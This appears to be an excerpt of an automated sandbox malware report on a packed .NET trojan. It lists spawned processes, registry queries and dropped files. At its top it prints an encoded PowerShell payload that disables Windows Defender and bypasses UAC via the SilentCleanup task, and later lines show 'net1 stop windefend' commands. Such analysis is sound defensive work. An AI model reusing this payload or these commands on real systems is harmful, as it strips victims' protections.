QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmA
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start TrustedInstaller
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" start lsass
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net1.exe "C:\Windows\system32\net1.exe" stop windefend
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\SecurityHealthSystray.exe SecurityHealthSystray

Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qaaoaguaywboag8aiabvagyazgalackawwaxaf0adqakahmacaagaccasablaemavqa6afwavgbvagwayqb0agkabablacaarqbuahyaaqbyag8abgbtaguabgb0accaiaanafqabwbnagcabablaeqazqbmaguabgbkaguacganacaaqaanaa0acgbpagyaiaaoacqakabzagmalgblahgazqagaheaywagahcaaqbuagqazqbmaguabgbkackaiaatagwaaqbraguaiaanacoavabpaecarwbmaeuakganackaiab7acqavabpaecarwbmaeuapqa3adsajablaeuarqbqad0anga7acqaqqa9accarqbuageaygbsaguajwa7acqauwa9accatwbgaeyajwb9aguababzaguaewakafqatwbhaecatabfad0anga7acqaswbfaeuauaa9adcaowakaeeapqanaeqaaqbzageaygbsaguajwa7acqauwa9accatwboaccafqanaaoadqakagkazgagacgajablag4adga6adeaiaatag4azqagadyaiaatageabgbkacaajablag4adga6adeaiaatag4azqagadcakqagahsaiaakaguabgb2adoamqa9acqavabpaecarwbmaeuaiab9aa0acganaaoacwb0ageacgb0acaaywbtagqaiaatageacgbnahmaiaanac8azaavahiaiabtaguaywb1ahiaaqb0ahkasablageabab0aggauwb5ahmadabyageaeqagacyaiaaiacuauabyag8azwbyageabqbgagkabablahmajqbcafcaaqbuagqabwb3ahmaiabeaguazgblag4azablahiaxabnafmaqqbtaemadqbpaewalgblahgazqaiaccaiaatahcaaqbuacaamqanaaoadqakacqabgbvahqaaqbmad0ajwbiaesaqwbvadoaxabtae8argbuafcaqqbsaeuaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabdahuacgbyaguabgb0afyazqbyahmaaqbvag4axaboag8adabpagyaaqbjageadabpag8abgbzafwauwblahqadabpag4azwbzafwavwbpag4azabvahcacwauafmaeqbzahqazqbtafqabwbhahmadaauafmazqbjahuacgbpahqaeqbbag4azabnageaaqbuahqazqbuageabgbjaguajwanaaoabgbpacaajabuag8adabpagyaiaataguayqagadaafabvahuadaatag4adqbsagwaowagahiaaqagacqabgbvahqaaqbmac4acgblahaababhagmazqaoaccauwblahqadabpag4azwbzaccalaanaemadqbyahiazqbuahqajwapacaalqbsaguaywb1ahiacwblacaalqbgag8acgbjaguaiaataguayqagadaadqakahmacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagadaaiaatafqaeqbwaguaiabeahcabwbyagqaiaataeyabwbyagmazqagac0azqbhacaamaa7acaaaqbmacaakaakafqatwbhaecatabfacaalqblaheaiaa3ackaiab7ahiacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagac0argbvahiaywblacaalqblageaiaawah0adqakaa0acgakahqacwa9ae4azqb3ac0atwbiagoazqbjahqaiaataemabwbtae8aygbqaguaywb0acaajwbtagmaaablagqadqbsagualgbtaguacgb2agkaywblaccaowagacqadabzac4aqwbvag4abgblagmadaaoackaowagacqaygbhagyazgbsagkabgbnad0ajab0ahmalgbhaguadabgag8ababkaguacgaoaccaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabeagkacwbraemabablageabgb1ahaajwapaa0acgakagiacabhahmacwa9acqaygbhagyazgbsagkabgbnac4arwblahqavabhahmaawaoaccauwbpagwazqbuahqaqwbsaguayqbuahuacaanackaowagacqazgbsageadwa9acqaygbwageacwbzac4arablagyaaqbuagkadabpag8abganaaoadqakacqadqa9adaaowakahcapqb3aggabwbhag0aaqagac8azwbyag8adqbwahmaowbpagyakaakahcalqbsagkaawblaccakgaxac0anqatadmamgataduanaa0acoajwapahsajab1ad0amqb9adsaaqbmacgajab3ac0ababpagsazqanacoamqatadeangatadeamgayadgaoaaqaccakqb7acqadqa9adiafqa7agkazgaoacqadwatagwaaqbraguajwaqadealqaxadyalqaxadyamwa4adqakganackaewakahuapqazah0adqakaa0acgakahiapqbbagmaaabhahiaxqaxadmaowagacqabgbmag8apqbbagmaaabhahiaxqazadkakwakahiakwanacaakabcacaaiaagac8akqanacsajabyacsajwaoacaakgagac4aiaaqacaakqagacaaqqagagwaaqbtagkadablagqaiabhagmaywbvahuabgb0acaacabyag8adablagmadabzacaaeqbvahuaiabma
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qaaoaguaywboag8aiabvagyazgalackawwaxaf0adqakahmacaagaccasablaemavqa6afwavgbvagwayqb0agkabablacaarqbuahyaaqbyag8abgbtaguabgb0accaiaanafqabwbnagcabablaeqazqbmaguabgbkaguacganacaaqaanaa0acgbpagyaiaaoacqakabzagmalgblahgazqagaheaywagahcaaqbuagqazqbmaguabgbkackaiaatagwaaqbraguaiaanacoavabpaecarwbmaeuakganackaiab7acqavabpaecarwbmaeuapqa3adsajablaeuarqbqad0anga7acqaqqa9accarqbuageaygbsaguajwa7acqauwa9accatwbgaeyajwb9aguababzaguaewakafqatwbhaecatabfad0anga7acqaswbfaeuauaa9adcaowakaeeapqanaeqaaqbzageaygbsaguajwa7acqauwa9accatwboaccafqanaaoadqakagkazgagacgajablag4adga6adeaiaatag4azqagadyaiaatageabgbkacaajablag4adga6adeaiaatag4azqagadcakqagahsaiaakaguabgb2adoamqa9acqavabpaecarwbmaeuaiab9aa0acganaaoacwb0ageacgb0acaaywbtagqaiaatageacgbnahmaiaanac8azaavahiaiabtaguaywb1ahiaaqb0ahkasablageabab0aggauwb5ahmadabyageaeqagacyaiaaiacuauabyag8azwbyageabqbgagkabablahmajqbcafcaaqbuagqabwb3ahmaiabeaguazgblag4azablahiaxabnafmaqqbtaemadqbpaewalgblahgazqaiaccaiaatahcaaqbuacaamqanaaoadqakacqabgbvahqaaqbmad0ajwbiaesaqwbvadoaxabtae8argbuafcaqqbsaeuaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabdahuacgbyaguabgb0afyazqbyahmaaqbvag4axaboag8adabpagyaaqbjageadabpag8abgbzafwauwblahqadabpag4azwbzafwavwbpag4azabvahcacwauafmaeqbzahqazqbtafqabwbhahmadaauafmazqbjahuacgbpahqaeqbbag4azabnageaaqbuahqazqbuageabgbjaguajwanaaoabgbpacaajabuag8adabpagyaiaataguayqagadaafabvahuadaatag4adqbsagwaowagahiaaqagacqabgbvahqaaqbmac4acgblahaababhagmazqaoaccauwblahqadabpag4azwbzaccalaanaemadqbyahiazqbuahqajwapacaalqbsaguaywb1ahiacwblacaalqbgag8acgbjaguaiaataguayqagadaadqakahmacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagadaaiaatafqaeqbwaguaiabeahcabwbyagqaiaataeyabwbyagmazqagac0azqbhacaamaa7acaaaqbmacaakaakafqatwbhaecatabfacaalqblaheaiaa3ackaiab7ahiacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagac0argbvahiaywblacaalqblageaiaawah0adqakaa0acgakahqacwa9ae4azqb3ac0atwbiagoazqbjahqaiaataemabwbtae8aygbqaguaywb0acaajwbtagmaaablagqadqbsagualgbtaguacgb2agkaywblaccaowagacqadabzac4aqwbvag4abgblagmadaaoackaowagacqaygbhagyazgbsagkabgbnad0ajab0ahmalgbhaguadabgag8ababkaguacgaoaccaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabeagkacwbraemabablageabgb1ahaajwapaa0acgakagiacabhahmacwa9acqaygbhagyazgbsagkabgbnac4arwblahqavabhahmaawaoaccauwbpagwazqbuahqaqwbsaguayqbuahuacaanackaowagacqazgbsageadwa9acqaygbwageacwbzac4arablagyaaqbuagkadabpag8abganaaoadqakacqadqa9adaaowakahcapqb3aggabwbhag0aaqagac8azwbyag8adqbwahmaowbpagyakaakahcalqbsagkaawblaccakgaxac0anqatadmamgataduanaa0acoajwapahsajab1ad0amqb9adsaaqbmacgajab3ac0ababpagsazqanacoamqatadeangatadeamgayadgaoaaqaccakqb7acqadqa9adiafqa7agkazgaoacqadwatagwaaqbraguajwaqadealqaxadyalqaxadyamwa4adqakganackaewakahuapqazah0adqakaa0acgakahiapqbbagmaaabhahiaxqaxadmaowagacqabgbmag8apqbbagmaaabhahiaxqazadkakwakahiakwanacaakabcacaaiaagac8akqanacsajabyacsajwaoacaakgagac4aiaaqacaakqagacaaqqagagwaaqbtagkadablagqaiabhagmaywbvahuabgb0acaacabyag8adablagmadabzacaaeqbvahuaiabma
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qaaoaguaywboag8aiabvagyazgalackawwaxaf0adqakahmacaagaccasablaemavqa6afwavgbvagwayqb0agkabablacaarqbuahyaaqbyag8abgbtaguabgb0accaiaanafqabwbnagcabablaeqazqbmaguabgbkaguacganacaaqaanaa0acgbpagyaiaaoacqakabzagmalgblahgazqagaheaywagahcaaqbuagqazqbmaguabgbkackaiaatagwaaqbraguaiaanacoavabpaecarwbmaeuakganackaiab7acqavabpaecarwbmaeuapqa3adsajablaeuarqbqad0anga7acqaqqa9accarqbuageaygbsaguajwa7acqauwa9accatwbgaeyajwb9aguababzaguaewakafqatwbhaecatabfad0anga7acqaswbfaeuauaa9adcaowakaeeapqanaeqaaqbzageaygbsaguajwa7acqauwa9accatwboaccafqanaaoadqakagkazgagacgajablag4adga6adeaiaatag4azqagadyaiaatageabgbkacaajablag4adga6adeaiaatag4azqagadcakqagahsaiaakaguabgb2adoamqa9acqavabpaecarwbmaeuaiab9aa0acganaaoacwb0ageacgb0acaaywbtagqaiaatageacgbnahmaiaanac8azaavahiaiabtaguaywb1ahiaaqb0ahkasablageabab0aggauwb5ahmadabyageaeqagacyaiaaiacuauabyag8azwbyageabqbgagkabablahmajqbcafcaaqbuagqabwb3ahmaiabeaguazgblag4azablahiaxabnafmaqqbtaemadqbpaewalgblahgazqaiaccaiaatahcaaqbuacaamqanaaoadqakacqabgbvahqaaqbmad0ajwbiaesaqwbvadoaxabtae8argbuafcaqqbsaeuaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabdahuacgbyaguabgb0afyazqbyahmaaqbvag4axaboag8adabpagyaaqbjageadabpag8abgbzafwauwblahqadabpag4azwbzafwavwbpag4azabvahcacwauafmaeqbzahqazqbtafqabwbhahmadaauafmazqbjahuacgbpahqaeqbbag4azabnageaaqbuahqazqbuageabgbjaguajwanaaoabgbpacaajabuag8adabpagyaiaataguayqagadaafabvahuadaatag4adqbsagwaowagahiaaqagacqabgbvahqaaqbmac4acgblahaababhagmazqaoaccauwblahqadabpag4azwbzaccalaanaemadqbyahiazqbuahqajwapacaalqbsaguaywb1ahiacwblacaalqbgag8acgbjaguaiaataguayqagadaadqakahmacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagadaaiaatafqaeqbwaguaiabeahcabwbyagqaiaataeyabwbyagmazqagac0azqbhacaamaa7acaaaqbmacaakaakafqatwbhaecatabfacaalqblaheaiaa3ackaiab7ahiacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagac0argbvahiaywblacaalqblageaiaawah0adqakaa0acgakahqacwa9ae4azqb3ac0atwbiagoazqbjahqaiaataemabwbtae8aygbqaguaywb0acaajwbtagmaaablagqadqbsagualgbtaguacgb2agkaywblaccaowagacqadabzac4aqwbvag4abgblagmadaaoackaowagacqaygbhagyazgbsagkabgbnad0ajab0ahmalgbhaguadabgag8ababkaguacgaoaccaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabeagkacwbraemabablageabgb1ahaajwapaa0acgakagiacabhahmacwa9acqaygbhagyazgbsagkabgbnac4arwblahqavabhahmaawaoaccauwbpagwazqbuahqaqwbsaguayqbuahuacaanackaowagacqazgbsageadwa9acqaygbwageacwbzac4arablagyaaqbuagkadabpag8abganaaoadqakacqadqa9adaaowakahcapqb3aggabwbhag0aaqagac8azwbyag8adqbwahmaowbpagyakaakahcalqbsagkaawblaccakgaxac0anqatadmamgataduanaa0acoajwapahsajab1ad0amqb9adsaaqbmacgajab3ac0ababpagsazqanacoamqatadeangatadeamgayadgaoaaqaccakqb7acqadqa9adiafqa7agkazgaoacqadwatagwaaqbraguajwaqadealqaxadyalqaxadyamwa4adqakganackaewakahuapqazah0adqakaa0acgakahiapqbbagmaaabhahiaxqaxadmaowagacqabgbmag8apqbbagmaaabhahiaxqazadkakwakahiakwanacaakabcacaaiaagac8akqanacsajabyacsajwaoacaakgagac4aiaaqacaakqagacaaqqagagwaaqbtagkadablagqaiabhagmaywbvahuabgb0acaacabyag8adablagmadabzacaaeqbvahuaiabma
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qaaoaguaywboag8aiabvagyazgalackawwaxaf0adqakahmacaagaccasablaemavqa6afwavgbvagwayqb0agkabablacaarqbuahyaaqbyag8abgbtaguabgb0accaiaanafqabwbnagcabablaeqazqbmaguabgbkaguacganacaaqaanaa0acgbpagyaiaaoacqakabzagmalgblahgazqagaheaywagahcaaqbuagqazqbmaguabgbkackaiaatagwaaqbraguaiaanacoavabpaecarwbmaeuakganackaiab7acqavabpaecarwbmaeuapqa3adsajablaeuarqbqad0anga7acqaqqa9accarqbuageaygbsaguajwa7acqauwa9accatwbgaeyajwb9aguababzaguaewakafqatwbhaecatabfad0anga7acqaswbfaeuauaa9adcaowakaeeapqanaeqaaqbzageaygbsaguajwa7acqauwa9accatwboaccafqanaaoadqakagkazgagacgajablag4adga6adeaiaatag4azqagadyaiaatageabgbkacaajablag4adga6adeaiaatag4azqagadcakqagahsaiaakaguabgb2adoamqa9acqavabpaecarwbmaeuaiab9aa0acganaaoacwb0ageacgb0acaaywbtagqaiaatageacgbnahmaiaanac8azaavahiaiabtaguaywb1ahiaaqb0ahkasablageabab0aggauwb5ahmadabyageaeqagacyaiaaiacuauabyag8azwbyageabqbgagkabablahmajqbcafcaaqbuagqabwb3ahmaiabeaguazgblag4azablahiaxabnafmaqqbtaemadqbpaewalgblahgazqaiaccaiaatahcaaqbuacaamqanaaoadqakacqabgbvahqaaqbmad0ajwbiaesaqwbvadoaxabtae8argbuafcaqqbsaeuaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabdahuacgbyaguabgb0afyazqbyahmaaqbvag4axaboag8adabpagyaaqbjageadabpag8abgbzafwauwblahqadabpag4azwbzafwavwbpag4azabvahcacwauafmaeqbzahqazqbtafqabwbhahmadaauafmazqbjahuacgbpahqaeqbbag4azabnageaaqbuahqazqbuageabgbjaguajwanaaoabgbpacaajabuag8adabpagyaiaataguayqagadaafabvahuadaatag4adqbsagwaowagahiaaqagacqabgbvahqaaqbmac4acgblahaababhagmazqaoaccauwblahqadabpag4azwbzaccalaanaemadqbyahiazqbuahqajwapacaalqbsaguaywb1ahiacwblacaalqbgag8acgbjaguaiaataguayqagadaadqakahmacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagadaaiaatafqaeqbwaguaiabeahcabwbyagqaiaataeyabwbyagmazqagac0azqbhacaamaa7acaaaqbmacaakaakafqatwbhaecatabfacaalqblaheaiaa3ackaiab7ahiacaagacqabgbvahqaaqbmacaarqbuageaygbsaguazaagac0argbvahiaywblacaalqblageaiaawah0adqakaa0acgakahqacwa9ae4azqb3ac0atwbiagoazqbjahqaiaataemabwbtae8aygbqaguaywb0acaajwbtagmaaablagqadqbsagualgbtaguacgb2agkaywblaccaowagacqadabzac4aqwbvag4abgblagmadaaoackaowagacqaygbhagyazgbsagkabgbnad0ajab0ahmalgbhaguadabgag8ababkaguacgaoaccaxabnagkaywbyag8acwbvagyadabcafcaaqbuagqabwb3ahmaxabeagkacwbraemabablageabgb1ahaajwapaa0acgakagiacabhahmacwa9acqaygbhagyazgbsagkabgbnac4arwblahqavabhahmaawaoaccauwbpagwazqbuahqaqwbsaguayqbuahuacaanackaowagacqazgbsageadwa9acqaygbwageacwbzac4arablagyaaqbuagkadabpag8abganaaoadqakacqadqa9adaaowakahcapqb3aggabwbhag0aaqagac8azwbyag8adqbwahmaowbpagyakaakahcalqbsagkaawblaccakgaxac0anqatadmamgataduanaa0acoajwapahsajab1ad0amqb9adsaaqbmacgajab3ac0ababpagsazqanacoamqatadeangatadeamgayadgaoaaqaccakqb7acqadqa9adiafqa7agkazgaoacqadwatagwaaqbraguajwaqadealqaxadyalqaxadyamwa4adqakganackaewakahuapqazah0adqakaa0acgakahiapqbbagmaaabhahiaxqaxadmaowagacqabgbmag8apqbbagmaaabhahiaxqazadkakwakahiakwanacaakabcacaaiaagac8akqanacsajabyacsajwaoacaakgagac4aiaaqacaakqagacaaqqagagwaaqbtagkadablagqaiabhagmaywbvahuabgb0acaacabyag8adablagmadabzacaaeqbvahuaiabma

Source: Loaader.exe, 00000015.00000002.3282228143.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: Loaader.exe, 00000015.00000002.3282228143.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, Loaader.exe, 00000015.00000002.3282228143.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@

Source: C:\Users\user\AppData\Roaming\Loaader.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Roaming\Loaader.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Client.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Infected.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\WinDefend.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
